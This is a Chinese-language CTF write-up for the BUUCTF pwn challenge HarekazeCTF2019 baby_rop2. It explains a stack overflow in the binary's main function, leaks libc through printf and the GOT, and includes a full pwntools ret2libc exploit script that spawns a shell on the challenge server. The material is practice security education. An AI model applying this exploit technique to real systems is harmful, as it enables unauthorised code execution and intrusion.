BUU刷题-Pwn-_HarekazeCTF2019_baby_rop2

解题思路：

泄露或修改内存数据：

1. 堆地址：无需
2. 栈地址：无需
3. libc地址：[[利用got表和plt表泄露数据]] printf
4. BSS段地址：无需
   劫持程序执行流程：[[ret2libc(栈溢出调用任意函数)]]
   获得shell或flag：[[调用libc中的system]]

学到的知识：

[[LibcSearcher的使用]]

题目信息：

┌──(kali㉿kali)-[~/Desktop]
└─$ file _HarekazeCTF2019_baby_rop2 
_HarekazeCTF2019_baby_rop2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fab931b976ae2ff40aa1f5d1926518a0a31a8fd7, not stripped
                                                                                                        
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=_HarekazeCTF2019_baby_rop2 
\RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH     Symbols        FORTIFY  Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   71) Symbols      No     0               2               _HarekazeCTF2019_baby_rop2

libc版本：
wp借鉴：

核心伪代码分析：

存在利用的的代码：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[28]; // [rsp+0h] [rbp-20h] BYREF
  int v5; // [rsp+1Ch] [rbp-4h]

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  printf("What's your name? ");
  v5 = read(0, buf, 0x100uLL);
  buf[v5 - 1] = 0;
  printf("Welcome to the Pwn World again, %s!\n", buf);
  return 0;
}

分析：

利用printf泄露函数地址，从而利用system函数。
调用printf函数需要两个参数，所以需要使用rdi和rsi两个寄存器！！！
但如果是单独泄露libc只需要一个寄存器rdi！

.rodata:0000000000400770 
aWelcomeToThePw db 'Welcome to the Pwn World again, %s!',0Ah,0

调用其中的%s来输出函数地址。
rdi: format_str=0x400770
输出函数地址：
printf_got或者read_got
但泄露printf_got时无法泄露

/home/kali/Desktop/buuexp(_HarekazeCTF2019_baby_rop2).py:21: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  sh.recvuntil('\n')
[DEBUG] Received 0x51 bytes:
    b'Welcome to the Pwn World again, aaaaaaaaaaaaaaaaaaaaaaaaaaaaI!\n'
    b"What's your name? "
No matched libc, please add more libc or try others

所以泄露read的地址即可！！！

脚本：

from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')

pwnfile='./_HarekazeCTF2019_baby_rop2'
sh=remote('node4.buuoj.cn',29604)
elf = ELF(pwnfile)
#sh=process(pwnfile)

pop_rdi = 0x400733
main_addr=elf.sym['main']

#payload=0x28*b'a'+p64(pop_rdi)+p64(elf.got['printf'])+p64(elf.plt['printf'])+p64(main_addr)
payload=0x28*b'a'+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['printf'])+p64(main_addr)

#gdb.attach(sh)
#pause()
sh.recvuntil("What's your name?")
sh.sendline(payload)

sh.recvuntil('\n')

read_addr = u64(sh.recv(6).ljust(8,b'\x00'))

libc=LibcSearcher('read',read_addr)

offset=read_addr-libc.dump('read')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

print("read_addr:",hex(read_addr))
print("base_addr:",hex(offset))
print("bin_sh_addr:",hex(bin_sh))
print("system_addr:",hex(system))
'''
printf_addr = u64(sh.recv(6).ljust(8,b'\x00'))

libc=LibcSearcher('printf',printf_addr)

offset=printf_addr-libc.dump('printf')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

print("printf:",hex(printf_addr))
print("base_addr:",hex(offset))
print("bin_sh_addr:",hex(bin_sh))
print("system_addr:",hex(system))
'''
payload1=0x28*b'a'+p64(pop_rdi)+p64(bin_sh)+p64(system)
sh.recvuntil("What's your name?")
sh.sendline(payload1)

sh.interactive()